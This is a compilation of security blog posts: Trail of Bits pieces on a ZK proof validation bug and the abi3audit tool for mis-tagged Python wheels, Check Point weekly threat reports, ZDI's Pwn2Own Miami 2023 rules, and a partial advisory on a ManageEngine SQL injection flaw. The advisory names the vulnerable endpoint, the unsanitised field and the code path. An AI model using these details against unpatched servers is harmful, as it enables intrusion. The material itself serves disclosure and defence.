threshold signature implementation. ## The moral of the story In the end, this is a cryptographic failure stemming from a completely understandable data validation oversight. Values provided by another party should always be checked against all applicable constraints before being used. Heck, values computed from values provided by another party should always be checked against all applicable constraints. But if you look at mathematical descriptions of these ZK proofs, or even well-written pseudocode, where are these constraints spelled out? These documents describe the algorithms mathematically, not concretely. You see steps such as β←$Z*N, followed later by v = (N + 1)αβN (mod N2). From a mathematical standpoint, it’s understood that v is in Z*N2, and thus  v ≠ 0. From a programming standpoint, though, there’s no explicit indication that there’s a constraint to check on v.

Trail of Bits maintains a resource guide for ZK proof systems at zkdocs.com. These types of issues are one of our primary motivations for such guidance—translating mathematical and theoretical descriptions into software is a difficult process. Admittedly, some of our own descriptions could explain these checks more clearly; we’re hoping to have that fixed in an upcoming release.

One piece of guidance that Trail of Bits likes to give auditors and cryptographers is to look out for two special values: 0 and 1 (as well as their analogues, like the point at infinity). Bugs related to 0 or its analogues have caused problems in the past (for instance, here and here). In this case, a failure to check for 0 leads to two separate bugs that allow attackers in a threshold signature scheme to lead honest parties down a rabbit hole.

##### ABI compatibility in Python: How hard could it be?

TL;DR: Trail of Bits has developed abi3audit, a new Python tool for checking Python packages for CPython application binary interface (ABI) violations. We’ve used it to discover hundreds of inconsistently and incorrectly tagged package distributions, each of which is a potential source of crashes and exploitable memory corruption due to undetected ABI differences. It’s publicly available under a permissive open source license, so you can use it today!

Python is one of the most popular programming languages, with a correspondingly large package ecosystem: over 600,000 programmers use PyPI to distribute over 400,000 unique packages, powering much of the world’s software.

The age of Python’s packaging ecosystem also sets it apart: among general-purpose languages, it is predated only by Perl’s CPAN. This, combined with the mostly independent development of packaging tooling and standards, has made Python’s ecosystem among the more complex of the major programming language ecosystems. Those complexities include:

• Two major current packaging formats (source distributions and wheels), as well as a smattering of domain-specific and legacy formats (zipapps, Python Eggs, conda’s own format, &c.);

• A constellation of different packaging tools and package specification files: setuptools, flit, poetry, and PDM, as well as pip, pipx, and pipenv for actually installing packages;

• …and a corresponding constellation of package and dependency specification files: pyproject.toml (PEP 518-style), pyproject.toml (Poetry-style), setup.py, setup.cfg, Pipfile, requirements.txt, MANIFEST.in, and so forth.

This post will cover just one tiny piece of Python packaging’s complexity: the CPython stable ABI. We’ll see what the stable ABI is, why it exists, how it’s integrated into Python packaging, and how each piece goes terribly wrong to make accidental ABI violations easy.

## The CPython stable API and ABI

Not unlike many other reference implementations, Python’s reference implementation (CPython) is written in C and provides two mechanisms for native interaction:

• A C Application Programming Interface (API), allowing C and C++ programmers to compile against CPython’s public headers and use any exposed functionality;

• An Application Binary Interface (ABI), allowing any language with C ABI support (like Rust or Golang) to link against CPython’s runtime and use the same internals

Developers can use the CPython API and ABI to write CPython extensions. These extensions behave exactly like ordinary Python modules but interact directly with the interpreter’s implementation details rather than the “high-level” objects and APIs exposed in Python itself.

CPython extensions are a cornerstone of the Python ecosystem: they provide an “escape hatch” for performance-critical tasks in Python, as well as enable code reuse from native languages (like the broader C, C++, and Rust packaging ecosystems).

At the same time, extensions pose a problem: CPython’s APIs change between releases (as the implementation details of CPython change), meaning that it is unsound, by default, to load a CPython extension into an interpreter of a different version. The implications of this unsoundness vary: a user might get lucky and have no problems at all, might experience crashes due to missing functions or, worst of all, experience memory corruption due to changes in function signatures and structure layouts.

To ameliorate the situation, CPython’s developers created the stable API and ABI: a set of macros, types, functions, and data objects that are guaranteed to remain available and forward-compatible between minor releases. In other words: a CPython extension built for CPython 3.7’s stable API will also load and function correctly on CPython 3.8 and forwards, but is not guaranteed to load and function with CPython 3.6 or earlier.

At the ABI level, this compatibility is referred to as “abi3”, and is optionally tagged in the extension’s filename: mymod.abi3.so, for example, designates a loadable stable-ABI-compatible CPython extension module named mymod. Critically, the Python interpreter does not do anything with this tag — it’s simply ignored.

This is the first strike: CPython has no notion of whether an extension is actually stable-ABI-compatible. We’ll now see how this compounds with the state of Python packaging to produce even more problems.

## CPython extensions and packaging

On its own, a CPython extension is just a bare Python module. To be useful to others, it needs to be packaged and distributed like all other modules.

With source distributions, packaging a CPython extension is straightforward (for some definitions of straightforward): the source distribution’s build system (generally setup.py) describes the compilation steps needed to produce the native extension, and the package installer runs these steps during installation.

For example, here’s how we define microx’s native extension (microx_core) using setuptools:

Distributing a CPython extension via source distribution has advantages () and disadvantages ():

API and ABI stability are non-issues: the package either builds during installation or it doesn’t and, when it does build, it runs against the same interpreter that it built against.

Source builds are burdensome for users: they require end-users of Python software to install the CPython development headers, as well as maintain a native toolchain corresponding to the language or ecosystem that the extension targets. That means requiring a C/C++ (and increasingly, Rust) toolchain on every deployment machine, adding size and complexity.

Source builds are fundamentally fragile: compilers and native dependencies are in constant flux, leaving end users (who are Python experts at best, not compiled language experts) to debug compiler and linker errors.

The Python packaging ecosystem’s solution to these problems is wheels. Wheels are a binary distribution format, which means that they can (but are not required to) provide pre-compiled binary extensions and other shared objects that can be installed as-is, without custom build steps. This is where ABI compatibility is absolutely essential: binary wheels are loaded blindly by the CPython interpreter, so any mismatch between the actual and expected interpreter ABIs can cause crashes (or worse, exploitable memory corruption).

Because wheels can contain pre-compiled extensions, they need to be tagged for the version(s) of Python that they support. This tagging is done with PEP 425-style “compatibility” tags: microx-1.4.1-cp37-cp37m-macosx_10_15_x86_64.whl designates a wheel that was built for CPython 3.7 on macOS 10.15 for x86-64, meaning that other Python versions, host OSes, and architectures should not attempt to install it.

On its own, this limitation makes wheel packaging for CPython extensions a bit of a hassle:

In order to support all valid combinations of {Python Version, Host OS, Host Architecture}, the packager must build a valid wheel for each. This means additional test, build, and distribution complexity, as well as exponential CI growth as a package’s support matrix expands.

Because wheels are (by default) tied to a single Python version, packagers are required to generate a new set of wheels on each Python minor version change. In other words: new Python versions start out without access to a significant chunk of the packaging ecosystem until packagers can play catch up.

This is where the stable ABI becomes critical: instead of building one wheel per Python, version packagers can build an “abi3” wheel for the lowest supported Python version. This comes with the guarantee that the wheel will work on all future (minor) releases, solving both the build matrix size problem and the ecosystem bootstrapping problem above.

Building an “abi3” wheel is a two-step process: the wheel is built locally (usually using the same build system as the source distribution) and then retagged with abi3 as the ABI tag rather than a single Python version (like cp37 for CPython 3.7).

Critically: neither of these steps is validated, because Python’s build tools have no good way to validate them. This leaves us with the second and third strikes:

• To correctly build a wheel against the stable API and ABI, the build needs to set the Py_LIMITED_API macro to the intended CPython support version (or, for Rust with PyO3, to use the correct build feature). This prevents Python’s C headers from using non-stable functionality or potentially inlining incompatible implementation details.

For example, to build a wheel as cp37-abi3 (stable ABI for CPython 3.7+), the extension needs to either #define Py_LIMITED_API 0x03070000 in its own source code, or use the setuptools.Extension construct’s define_macros argument to configure it. These are easy to forget, and produce no warning when forgotten!

Additionally, when using setuptools, the packager may choose to set py_limited_api=True. But this does not enable any actual API restrictions; it merely adds the .abi3 tag to the built extension’s filename. As you’ll recall this is not currently checked by the CPython interpreter, so this is effectively a no-op.

Critically, it does not affect the actual wheel build. The wheel is built however the underlying setuptools.Extension sees fit: it might be completely right, it might be a little wrong (stable ABI, but for the wrong CPython version), or it might be completely wrong.

This breakdown happens because of the devolved nature of Python packaging: the code that builds extensions is in pypa/setuptools, while the code that builds wheels is in pypa/wheel — two completely separate codebases. Extension building is designed as a black box, a fact that Rust and other language ecosystems take advantage of (there is no Py_LIMITED_API macro to sensibly define in a PyO3-based extension — it’s all handled separately by build features).

To summarize:

• Stable ABI (“abi3”) wheels are the only reliable way to package native extensions without a massive build matrix.

• However, none of the dials that control abi3-compatible wheel building talk to each other: it’s possibly to build an abi3-compatible wheel without tagging it as such, or to build a non-abi3 wheel and tag it incorrectly as compatible, or to tag an abi3-compatible wheel as compatible with the wrong CPython version.

• Consequently, the correctness of the current abi3-compatible wheel ecosystem is suspect. ABI violations are capable of causing crashes and even exploitable memory corruption, so we need to quantify the current state of affairs.

## How bad is it, really?

This all seems pretty bad, but it’s just an abstract problem: it’s entirely possible that every Python packager gets their wheel builds right, and hasn’t published any incorrectly tagged (or completely invalid) abi3-style wheels.

To get a sense for how bad things really are, we developed abi3audit. Abi3audit’s entire raison d’être is finding these kinds of ABI violation bugs: it scans individual extensions, Python wheels (which can contain multiple extensions), and entire package histories, reporting back anything that doesn’t match the specified stable ABI version or is entirely incompatible with the stable ABI.

To get a list of auditable packages to feed into abi3audit, I used PyPI’s public BigQuery dataset to generate a list of every abi3-wheel-containing package downloaded from PyPI in the last 21 days:

#standardSQL
SELECT DISTINCT file.project
FROM bigquery-public-data.pypi.file_downloads
WHERE file.filename LIKE '%abi3%'
-- Only query the last 21 days of history
AND DATE(timestamp)
BETWEEN DATE_SUB(CURRENT_DATE(), INTERVAL 21 DAY)
AND CURRENT_DATE()


( I chose 21 because I blew through my BigQuery quota while testing. It’d be interesting to see the full list of downloads over a year or the entire history of PyPI, although I’d expect diminishing returns.)

From that query, I got 357 packages, which I’ve uploaded as a GitHub Gist. With those packages saved, a JSON report from abi3audit was only a single invocation away:

The JSON from that audit is also available as a GitHub Gist.

First, some high-level statistics:

• Of the 357 initial packages queried from PyPI, 339 actually contained auditable wheels. Some were 404s (presumably created and then deleted), while others were tagged with abi3 but did not actually contain any CPython extension modules (which does, technically, make them abi3 compatible!). A handful of these were ctypes-style modules, with either a vendored library or code to load a library that the host was expected to contain.

• Those 339 remaining packages had a total of 13650 abi3-tagged wheels between them. The largest (in terms of wheels) was eclipse-zenoh-nightly, with 1596 wheels (or nearly 12 percent of all abi3-tagged wheels on PyPI).

• The 13650 abi3-tagged wheels had a total of 39544 shared objects, each a potential Python extension, between them. In other words: the average abi3-tagged wheel has 2.9 shared objects in it, each of which was audited by abi3audit.

• Attempting to parse each shared object in each abi3-tagged wheel produced all kinds of curious results: plenty of wheels contained invalid shared objects: ELF files that began with garbage (but contained a valid ELF later in the file), temporary build artifacts that weren’t cleaned up, and a handful of wheels that appeared to contain editor-style swap files for hand-modified binaries. Unfortunately, unlike Moyix, we did not discover any catgirls.

Now, the juicy parts:

Of the 357 valid packages, 54 (15 percent) contained wheels with ABI version violations. In other words: roughly one in six packages had wheels that claimed support for a particular Python version, but actually used the ABI of a newer Python version.

More severely: of those same 357 valid packages, 11 (3.1 percent) contained outright ABI violations. In other words: roughly one in thirty packages had wheels that claimed to be stable ABI compatible, but weren’t at all!

In total, 1139 (roughly 3 percent) Python extensions had version violations, and 90 (roughly 0.02 percent) had outright ABI violations. This suggests two things: that the same packages tend to have ABI violations across multiple wheels and extensions, and that multiple extensions within the same wheel tend to have ABI violations at the same time (which makes sense, since they should share the same build).

Here are some that we found particularly interesting:

#### PyQt6 and sip

PyQt6 and sip are both part of the Qt project, and both had ABI version violations: multiple wheels were tagged for CPython 3.6 (cp36-abi3), but used APIs that were only stabilized with CPython 3.7.

sip additionally had a handful of wheels with outright ABI violations, all from the internal _Py_DECREF API:

#### refl1d

refl1d is a NIST-developed reflectometry package. They did a couple of releases tagged for the stable ABI of Python 3.2 (the absolute lowest), while actually targeting the stable ABI of Python 3.11 (the absolute highest — not even released yet!).

#### hdbcli

hdbcli appears to be a proprietary client for SAP HANA, published by SAP themselves. It’s tagged as abi3, which is cool! Unfortunately, it isn’t actually abi3-compatible:

This, again, suggests building without the correct macros. We’d be able to figure out more with the source code, but this package appears to be completely proprietary.

#### gdp and pifacecam

These are two smaller packages, but they piqued my interest because both had stable ABI violations that weren’t just the reference/counting helper APIs:

#### dockerfile

Finally, I liked this one because it turns out to be a Python extension written in Go, not C, C++, or Rust!

The maintainer had the right idea, but didn’t define Py_LIMITED_API to any particular value. So Python’s headers “helpfully” interpreted that as not limited at all:

## The path forward

First, the silver lining: most of the extremely popular packages in the list had no ABI violations or version mismatches. Cryptography and bcrypt were spared, for example, indicating strong build controls on their side. Other relatively popular packages had version violations, but they were generally minor (for example: expecting a function that was only stabilized with 3.7, but has been present and the same since 3.3).

Overall, however, these results are not great: they indicate (1) that a significant portion of the “abi3” wheels on PyPI aren’t really abi3-compatible at all (or are compatible with a different version than they claim), and (2) that maintainers don’t fully understand the different knobs that control abi3 tagging (and that those knobs do not actually modify the build itself).

More generally, the results point to a need for better controls, better documentation, and better interoperation between Python’s different packaging components. In nearly all cases, the package’s maintainer has attempted to do the right thing, but seemingly wasn’t aware of the additional steps necessary to actually build an abi3-compatible wheel. In addition to improving the package-side tooling here, the auditing is also automatable: we’ve designed abi3audit in part to demonstrate that it would be possible for PyPI to catch these kinds of wheel errors before they become a part of the public index.

##### We’re streamers now

Over the years, we’ve built many high-impact tools that we use for security reviews. You might know some of them, like Slither, Echidna, Amarna, Tealer, and test-fuzz. All of our tools are open source, and we love seeing the community benefit from them. But mastering our tools takes time and practice, and it’s easier if someone can guide you. To that end, we create several tutorials (see building-secure-contracts) and frequently host training sessions at conferences. Now we’re going one step further: we’re live-streaming workshops on Twitch and YouTube.

During our streams, Trail of Bits engineers will describe each of our tools in depth, giving users an inside look at the underlying technology and how they can use the tools in their own work. We will focus on providing hands-on experience, with real-world exercises, and answer common questions about the tools.

## First up: 6-part series on fuzzing smart contracts

We’ll share detailed technical presentations on fuzzing smart contracts, and guide attendees to write invariants for them in our first six workshops. Engineers will go over fuzzer setup, how to identify invariants—from simple to complex—and how to translate these invariants into code.

The workshops will be held on the following dates:

Building secure contracts: Learn how to fuzz like a pro

• Wednesday, November 16 (12pm ET): Introduction to fuzzing (Anish Naik)
• Tuesday, November 22: Fuzzing arithmetics (Anish Naik)
• Wednesday, November 30: Intro to AMM’s invariants (Justin Jacob)
• Tuesday, December 6: AMM fuzzing (Justin Jacob)
• Wednesday, December 14: Intro to advanced DeFi’s invariants (Nat Chin)
• Wednesday, December 21: Advanced DeFi invariants (Nat Chin)

You’re welcome to get familiar with our smart contract fuzzer, Echidna, before the workshop. However, it’s not a requirement: the first sessions will cover the basics, while subsequent sessions will be more advanced.

Each session will be interactive, with hosts available to answer questions as they come in from the livestream chat.

## More workshops on the way

We’re all about fuzzing, but we think our static analysis tools are pretty cool, too. In 2023, our livestream workshops will cover Slither, our static analysis tool for Solidity. We are also planning sessions that cover other tools from our catalog, such as our static analyzer and linter for Circom (Circomspect), our privacy testing library for deep learning systems (PrivacyRaven), and our interactive documentation on zero-knowledge proof systems and related primitives (ZKDocs). Let us know what tools you’d like to learn more about and we will see you on stream! Let us know which areas you’d like us to stream about in the future!

### Check Point Research

Retrieved title: Check Point Research, 3 item(s)
##### 28th November– Threat Intelligence Report

For the latest discoveries in cyber research for the week of 28th November, please download our Threat Intelligence Bulletin.

Top Attacks and Breaches

• The European Parliament website has been attacked following a vote declaring Russia a state sponsor of terrorism. The pro-Russian hacktivist groups Anonymous Russia and Killnet, have claimed responsibility for the attack, causing an ongoing DDoS (Distributed Denial of Service).
• Ukrainian organizations have been a victim of ransomware attacks that have been linked to the Russian military cyber-espionage group Sandworm (AKA Redmond, IRIDIUM). The group has used a new malware dubbed ‘RansomBoggs’, distributed by a PowerShell script from the domain controller. ‘RansomBoggs’ encrypts files using AES-256 in CBC mode using a random key, and adds a ‘.chsch’ extension to the encrypted files.
• The Ragnar Locker ransomware gang has published stolen data belonging to Zwijndrecht police, a local police unit in Antwerp, Belgium. The data, which was initially attributed to the municipality of Zwijndrecht, contains a large amount of personal information including thousands of car plate numbers, fines, crime report files, investigation reports, and more.
• The Sports betting company DraftKings has been breached, causing the loss of approximately $300K of funds from active user accounts. The threat actors managed to change user passwords, and enabled two-factor authentication on a different phone number which led them to gain personal bank account information. • Several American colleges, including Cincinnati State College, have been the victims of ransomware attacks over the Thanksgiving holiday. The threat actors shut down the colleges’ financial aid services, network printing, VPN tools, admission application platforms, transcript exchanges, grading tools and more. Ransomware attacks targeting educational institutions are a part of on-going recently observed trend. Check Point Threat Emulation provides protection against this threat (Trojan.Win.ViceSociety.*) • Black Basta ransomware group is running a campaign targeting organizations in the United States, Canada, United Kingdom, Australia, and New Zealand. The group uses QakBot (AKA QBot, Pinkslipbot) banking Trojan to infect an environment and install a backdoor allowing it to drop the ransomware. Successful exploitation will allow the ransomware group to steal victims’ financial data, including browser information, keystrokes, and credentials. Check Point Threat Emulation provides protection against this threat (Trojan.Wins.Qbot; Banker.Wins.Qbot) Vulnerabilities and Patches • Google has released an update for the Chrome web browser to patch a new, actively exploited zero-day vulnerability. Tracked as CVE-2022-4135, the vulnerability resides in the GPU component, as a heap-based buffer overflow bug that could be used to crash a program or execute arbitrary code, leading to unintended behavior. • Researchers have observed a recently patched SQL injection vulnerability in Zoho ManageEngine products. Tracked CVE-2022-40300, the flaw will let threat actors send a crafted request to the target server, which could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges. • Microsoft has tied an attack on seven facilities managing the electricity grid in Northern India to a vulnerable component, Boa web server, used by vendors across a variety of IoT devices and popular software development kits (SDKs). Successful exploitation could allow attackers to silently gain access to networks by collecting information from files. Threat Intelligence Reports • Researchers have investigated the Luna Moth ransomware campaign that has extorted hundreds of thousands of dollars from several victims in the legal and retail sectors, by using callback phishing and telephone-oriented attack delivery (TOAD). • A technical analysis of a new Go-based information stealer named ‘Aurora’ has been published. The malware steals sensitive information from browsers and cryptocurrency apps, exfiltrates data directly from disks, and loads additional payloads. • Researchers dived into a new ransomware tool called ‘AXLocker’, which encrypts several file types and make them unusable, steals Discord tokens from the victim’s machine, and demands a ransom payment to recover the encrypted files. Check Point Threat Emulation provides protection against this threat (Ransomware.Win.TouchTrapFiles.A) • Researchers have discovered a new variant of the ‘RansomExx’ ransomware, primarily designed to run on Linux operating system. The ransomware, operated by the DefrayX threat actor group, encrypts files using AES-256, with RSA used to protect the encryption keys. Check Point Threat Emulation provides protection against this threat (Ransomware.Wins.Ransomexx) • An information-stealing Google Chrome browser extension named ‘VenomSoftX’ is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web. The Chrome extension is being installed by the ViperSoftX Windows malware, which acts as a JavaScript-based RAT and cryptocurrency hijacker. The post 28th November– Threat Intelligence Report appeared first on Check Point Research. ##### 21st November– Threat Intelligence Report For the latest discoveries in cyber research for the week of 21st November, please download our Threat Intelligence Bulletin. Top Attacks and Breaches • US CISA has discovered nation-state threat activity affecting an American federal government entity. The attackers, who CISA estimates to be Iran-sponsored, exploited the 2021 ‘Log4Shell’ vulnerability in an unpatched server to gain initial access. Afterwards, the attackers deployed a cryptocurrency miner, harvested credentials, and employed various techniques to move laterally and establish persistence in the network. Check Point IPS provides protection against this threat (Apache Log4j Remote Code Execution (CVE-2021-44228; CVE-2021-45046)) • Check Point warns of increased scam and phishing activity targeting shoppers during the holiday season. Hackers and scammers are exploiting the boom in online sales during the Thanksgiving period to lure in as many potential victims as possible. • The FBI, alongside CISA and additional agencies, have published a security advisory regarding the Hive ransomware group. According to the FBI, Hive has ransomed over 1,300 organizations for a total of$100M in the past 18 months, focusing on targets in the Healthcare industry.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Hive.A; Ransomware.Wins.Hive.ta.B))

• The Russian government-affiliated hacktivist group Killnet has launched denial of service attacks against the White House website, as well as the satellite internet communication corporation Starlink which has been used by Ukraine. Killnet claims that the attack has successfully taken down the websites.
• Multiple groups have been exploiting a vulnerability in Adobe Commerce and Magento to gain access to online stores. The attacks, which have risen in volume towards the holiday season, allow the threat actors to gain permanent remote access to the online stores.

Check Point IPS provides protection against this threat (Adobe Commerce Command Injection (CVE-2022-24086))

• Meta has fired dozens of employees, after the employees had received thousands of dollars in bribes by outside hackers in return for granting access to users’ Facebook or Instagram profiles. The employees used the company’s internal support tool, which allows full access to any user account.
• In Michigan, schools in two counties were forced to suspend operations due to a ransomware attack. The threat actor behind the attack is not yet known.

Vulnerabilities and Patches

• Researchers have discovered a critical severity vulnerability affecting Spotify’s open source Backstage platform, which is being used by a large number of companies worldwide. The vulnerability could allow a threat actor to gain remote code execution, and was patched by the Spotify Backstage team.
• Samba has patched vulnerabilities in several versions of their software. In certain cases, the vulnerabilities could allow an attack to gain control of affected systems.
• Atlassian Confluence has released patches to critical severity vulnerabilities discovered in Atlassian Crowd Server, and in Atlassian Bitbucket. Both vulnerabilities could allow an attack to gain remote access to an unpatched system.
• F5 has published a security advisory regarding a vulnerability affecting its BIG-IP and BIG-IQ products, which could allow an attacker to gain access to an affected system after fulfilling certain requirements.

Threat Intelligence Reports

• Researchers have detected modifications made to the DTrack malware, which is being utilized by the North Korean APT group Lazarus. The malware includes spying tools such as keylogging and screenshotting, and also allows injection and exfiltration of files. Recently, the group has expanded its range of operations, and has been observed targeting entities in Europe and Latin America.

Check Point Threat Emulation provides protection against this threat (RAT.Win32.Dtrack; InfoStealer.Wins.Dtrack.A)

• An analysis of Emotet’s latest comeback has been published. After being inactive since July, Emotet campaigns have been detected in large volume in November. According to researchers, the threat actors have made multiple modifications to the malware, including to the end-stage payload which can now also drop the IcedID and Bumblebee malware variants.

• Researchers have analyzed the activity of the state-sponsored group dubbed Billbug, likely attributed to China. The group has targeted governments, defense agencies and a certificate authority, all based in Asia. According to the researchers, the motivation behind the attacks was data theft.
• A new botnet targeting Linux IoT devices has been discovered. The attackers attempt to gain access to devices via brute-forcing commonly used default passwords. According to the analysis, the goal of the botnet is to DDoS popular game servers.
• Researchers warn against cyberattacks leveraging the FIFA World Cup to lure victims in phishing attacks.

The post 21st November– Threat Intelligence Report appeared first on Check Point Research.

##### The New Face of Hacktivism

For decades, hacktivism has been associated with groups like Anonymous. Recently, though, something has changed. An entirely new kind of hacktivist has arisen: one with more resources, capabilities and power than anything we’ve seen before.

The post The New Face of Hacktivism appeared first on Check Point Research.

### Zero Day Initiative

Retrieved title: Zero Day Initiative - Blog, 3 item(s)
##### Pwn2Own Returns to Miami Beach for 2023

¡Bienvenidos de nuevo a Miami!

Even as we make our final preparations for our consumer-focused contest in Toronto, we’re already looking ahead to warmer climes and returning to the S4 Conference in Miami for our ICS/SCADA-themed event. Pwn2Own returns to South Beach on February 14-16, 2023, and for this year’s event, we’ve refined our target list to include the latest trends in the ICS world. As we did last year, we’ll have contestants both in person and around the world demonstrating the latest exploits on OPC Unified Architecture (OPC UA) Servers, OPC UA Clients, Data Gateways, and Edge systems.

Our inaugural Pwn2Own Miami was held back in January 2020 at the S4 Conference, and we had a fantastic time as we awarded over $280,000 USD in cash and prizes for 24 unique 0-day vulnerabilities. Last year, we awarded$400,000 for 26 unique 0-days (plus a few bug collisions). At that event, we crowned Daan Keuper (@daankeuper) and Thijs Alkemade (@xnyhps) from Computest Sector 7 (@sector7_nl) Master of Pwn for their multiple successful exploits. We’ll see if they return in 2023 to defend their crown.

This contest is not possible without the participation and help of our partners within the ICS community, and we would like to especially thank the folks at the OPC Foundation and AVEVA for their expertise and guidance. The cooperation of those within the ICS/SCADA community is essential in ensuring we have the right categories and targets. Pwn2Own Miami seeks to harden these platforms by revealing vulnerabilities and providing that research to the vendors. The goal is always to get these bugs fixed before they’re actively exploited by attackers. ICS vendors have been instrumental in making that goal a reality.

The 2023 edition of Pwn2Own Miami has four categories:

·      OPC Unified Architecture (OPC UA) Server
·      OPC Unified Architecture (OPC UA) Client
·      Data Gateway
·      Edge systems

You’ll notice these are different categories from previous years. These differences reflect the changing state of the ICS industry and better reflect current threats to SCADA systems. Let’s look at the details of each category.

OPC UA Server Category

The OPC Unified Architecture (UA) is a platform-independent, service-oriented architecture that integrates all the functionality of the individual OPC Classic specifications into one extensible framework. OPC UA serves as the universal translator protocol in the ICS world. It is used by almost all ICS products to send data between disparate vendor systems. While we’ve had OPC UA targets in the past, for this event, we’ve set up distinct Server and Client categories.

An attempt in this category must be launched against the target’s exposed network services from the contestant’s laptop within the contest network. An entry in the category must result in either a denial-of-service condition, arbitrary code execution, credential theft, or a bypass of the trusted application check.

The Credential Theft target should prove interesting. For this scenario, the contestant must create a session with a trusted certificate but use credentials acquired by either decrypting a password from an ongoing session or by abusing a vulnerability that allows for the retrieval of the stored password from the server. The server will be configured with an ‘admin’ account with a random password that is 12-16 characters long. A successful entry must log in using a legitimate client after the password is retrieved by some means. Brute force attacks won’t be allowed.

For the “bypass trusted application check” scenario, the contestant must bypass the trusted application check that occurs after the creation of a secure channel. Entries that bypass the check by manipulating the server security configuration are out of scope. There are additional requirements for this target, so definitely read the rules carefully if you want to enter.

Here is the full list of targets for the OPC UA Server category:

OPC UA Client Category

Similar to the Server category, we’ll have specific OPA UA Clients available to target. Again, the “bypass trusted application check” scenario must meet specific criteria, so you should check out the rules for a full description.

Here is the full list of targets for the OPC US Client category:

Data Gateway Category

This category focuses on devices that connect other devices of varying protocols. There are two products in this category. The first is the Triangle Microworks SCADA Data Gateway product. Triangle Microworks makes the most widely used DNP3 protocol stack.  The other is the Softing Secure Integration Server. According to their website, “Secure Integration Server covers the full range of OPC UA security features and enables the implementation of state-of-the-art security solutions.” We’ll see if that holds true throughout the contest.

A successful entry in this category must result in arbitrary code execution.

Edge Category

This category is new for 2023 and reflects how edge devices are often used in ICS/SCADA networks to manage and maintain systems. For this year’s event, we’ll have the AVEVA Edge Data Store as our sole target in this category. Edge Data Store collects, stores, and provides data from remote and uncrewed assets. This is an exciting addition to the contest, and we look forward to seeing what exploits researchers demonstrate against this target.

A successful entry in this category must result in arbitrary code execution.

Master of Pwn

No Pwn2Own contest would be complete without crowning a Master of Pwn, and Pwn2Own Miami is no exception. Earning the title comes with a slick trophy and  65,000 ZDI reward points (instant Platinum status in 2024, which includes a one-time bonus estimated at $25,000). For those not familiar with how it works, Master of Pwn points are accumulated for each successful attempt. While only the first demonstration in a category wins the full cash award, each successful entry claims the full number of Master of Pwn points. Since the order of attempts is determined by a random draw, those who receive later slots can still claim the Master of Pwn title – even if they earn a lower cash payout. To add to the excitement, there are penalties for withdrawing from an attempt once you register for it. If a contestant decides to withdraw from the registered attempt before the actual attempt, the Master of Pwn points for that attempt will be divided by 2 and deducted from the contestant's point total for the contest. Since Pwn2Own is now often a team competition, along with the initial deduction of points, the same number of Master of Pwn points will also be deducted from all contestant teams from the same company. The Complete Details The full set of rules for Pwn2Own Miami 2023 can be found here. They may be changed at any time without notice. Anyone thinking about participating should read the rules thoroughly and completely. Registration is required to ensure we have sufficient resources on hand at the event. Please contact ZDI at zdi@trendmicro.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine the order of attempts. Contest registration closes at 5:00 p.m. Eastern Standard Time on February 9, 2023. The Results We’ll be live blogging results throughout the competition. Be sure to keep an eye on the blog for the latest results. We’ll also be posting results and videos to Twitter, YouTube, Mastodon, LinkedIn, and Instagram, so follow us on your favorite flavor of social media for the latest news from the event. We look forward to seeing everyone again in Miami, and we look forward to seeing what new exploits and attack techniques they bring with them. ©2022 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners. ##### CVE-2022-40300: SQL Injection in ManageEngine Privileged Access Management In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Justin Hung and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched SQL injection vulnerability in Zoho ManageEngine products. The bug is due to improper validation of resource types in the AutoLogonHelperUtil class. Successful exploitation of this vulnerability could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications. ManageEngine recently patched a SQL injection vulnerability bug in their Password Manager Pro, PAM360, and Access Manager Plus products. The vulnerability is due to improper validation of resource types in the AutoLogonHelperUtil class. A remote attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges. The Vulnerability Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents, and digital identities of enterprises. The product is also included in other two similar ManageEngine products: PAM360 and Access Manager Plus. A user can access the web console on these products through HTTPS requests via the following ports: The HTTP request body may contain data of various types. The data type is indicated in the Content-Type header field. One of the standardized types is multipart, which contains various subtypes that share a common syntax. The most widely used subtype of multipart type is multipart/form-data. Multipart/form-data is made up of multiple parts, each of which contains a Content-Disposition header. Each part is separated by a string of characters. The string of characters separating the parts is defined by the boundary keyword found in the Content-Type header line. The Content-Disposition header contains parameters in “name=value” format. Additional header lines may be present in each part; each header line is separated by a CRLF sequence. The last header line is terminated by two consecutive CRLFs sequences and the form element’s data follows. The filename parameter in a ContentDisposition header provides a suggested file name to be used if the element's data is detached and stored in a separate file. A user with admin privileges can add/edit a resource type via Password Manager Pro web interface by clicking the menu “Resources” -> “Resource Types” -> “Add” (or “Edit”) and a HTTP multipart/form-data request will be submitted to the “AddResourceType.ve” endpoint, as an example shown below: where several form-data parts are transferred in the request, like “TYPEID”, “dnsname_label”, “resLabChkName__1”, etc. The data carried in the multipart/form-data part with a name parameter value of “resourceType” represents the name of the resource type, which is relevant to the vulnerability in this report. An SQL injection vulnerability exists in Password Manager Pro. The vulnerability is due to a lack of sanitization of the name of the resource type in the Java class AutoLogonHelperUtil. The AutoLogonHelperUtil class is used by several controller classes, like AutologonController and PasswordViewController, to construct a partial SQL statement related to the query for existing resource types. For example, if a user clicks the menu “Connections” on the web admin interface, a request will be sent to “AutoLogonPasswords.ec” endpoint, and the includeView() method of ViewProcessorServlet class is called. The includeView() method will use AutologonController class to handle the request. The AutologonController class is derived from the SqlViewController class and its updateViewModel() method is called to process the request. The updateViewModel() method will first call the initializeSQL() method to get an SQL statement. It then calls the getAsTableModel() method of the SQLQueryAPI class to execute the SQL statement. In the initializeSQL() method, it will call the getSQLString() method of the AutologonController class to get the SQL statement, which will invoke the getFilledString() method of the TemplateAPI class. In the getFilledString() method, it will call the getVariableValue() method of the AutologonController. The getVariableValue() method will use the getOSTypeCriteriaForView() method of the AutoLogonHelperUtil class to construct a partial SQL statement. The 